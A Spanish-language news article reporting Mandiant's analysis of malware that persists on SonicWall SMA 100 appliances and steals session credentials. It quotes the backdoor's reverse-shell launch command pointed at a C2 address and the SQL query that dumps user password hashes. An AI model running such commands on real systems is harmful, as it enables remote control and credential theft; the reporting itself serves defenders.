El malware se dirige a los dispositivos SonicWall de la serie SMA 100
Los investigadores de Mandiant han descubierto una campaña de malware dirigida a los dispositivos SonicWall de la serie SMA 100, cuyo origen se cree que está en China.
El malware se introdujo probablemente en 2021 y ha demostrado ser extremadamente resistente, soportando actualizaciones de firmware. Su objetivo principal es robar credenciales de usuario y conceder al atacante acceso con privilegios elevados a través de una variante del shell de comandos TinyShell python.
El malware se compone de una serie de scripts bash y un único binario ELF variante de TinyShell. El comportamiento general del conjunto de scripts bash maliciosos demuestra un profundo conocimiento del dispositivo y está bien adaptado al sistema para proporcionar estabilidad y persistencia.
La serie SMA 100 es un sistema de control de acceso que permite a los usuarios remotos iniciar sesión en los recursos de la empresa a través de un portal web de inicio de sesión único (SSO), y la interceptación de las credenciales de usuario proporcionaría al atacante una ventaja para obtener información confidencial.
El principal punto de entrada del malware es un script bash llamado firewalld, que ejecuta su bucle principal una vez por el cuadrado del número de archivos del sistema: ... ...for j in $(ls / -R) do for i in $(ls / -R) do:... El script se encarga de ejecutar un comando SQL para robar credenciales y de ejecutar el resto de componentes.
La función inicial de firewalld lanza la puerta trasera de TinyShell httpsd con el comando "nohup /bin/httpsd -cC2 DIRECCIÓN IP> -d 5 -m -1 -p 51432 > /dev/null 2>&1 &" si el proceso httpsd no se está ejecutando ya. Esto indica a TinyShell que se ejecute en modo reverse-shell y que se ponga en contacto con la dirección IP y el puerto especificados a la hora y el día especificados por la bandera -m, con el intervalo de baliza determinado por la bandera -d. Si no se proporciona ninguna dirección IP, el binario contiene una dirección IP codificada que se utiliza para el modo reverse-shell. También se puede utilizar en modo bind shell a la escucha.
El objetivo principal del malware parece ser robar las credenciales con hash de todos los usuarios conectados. En firewalld, lo consigue ejecutando rutinariamente el comando SQL select userName,password from Sessions contra la base de datos sqlite3 /tmp/temp.db y copiando los resultados al archivo de texto creado por el atacante /tmp/syslog.db. El dispositivo rastrea la información de sesión, incluidas las credenciales con hash, en la base de datos de origen /tmp/temp.db. Los hashes podrían ser descifrados fuera de línea una vez que el atacante los obtenga.
Los investigadores trabajaron con el Equipo de Seguridad de Productos y Respuesta a Incidentes (PSIRT) de SonicWall para analizar un dispositivo infectado y descubrieron que los atacantes trabajaron duro para que su herramienta fuera estable y persistente. Cada diez segundos, el malware comprueba si hay actualizaciones de firmware y se inyecta a sí mismo en la actualización para seguir recopilando credenciales después de la actualización.
Las fuentes de este artículo incluyen un artículo de Malwarebytes.